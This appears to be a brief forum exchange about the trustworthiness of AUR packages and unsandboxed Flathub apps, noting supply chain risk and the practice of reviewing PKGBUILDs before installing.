It’s great having so much software available but the AUR makes me nervous because you really don’t know who you’re trusting when you install something from there.
Flathub has hundreds of apps which are not sandboxed and untrustworthy. So, no source is safe, and even most “safe” apps are not protected from supply chain attacks. So, you always have to be careful. But I agree there are certainly degrees of safety, and the AUR is certainly another one, which should not be taken lightly.
It’s great having so much software available but the AUR makes me nervous because you really don’t know who you’re trusting when you install something from there.
That’s why you are supposed to check the pkgbuild before installing anything from the aur.
Flathub has hundreds of apps which are not sandboxed and untrustworthy. So, no source is safe, and even most “safe” apps are not protected from supply chain attacks. So, you always have to be careful. But I agree there are certainly degrees of safety, and the AUR is certainly another one, which should not be taken lightly.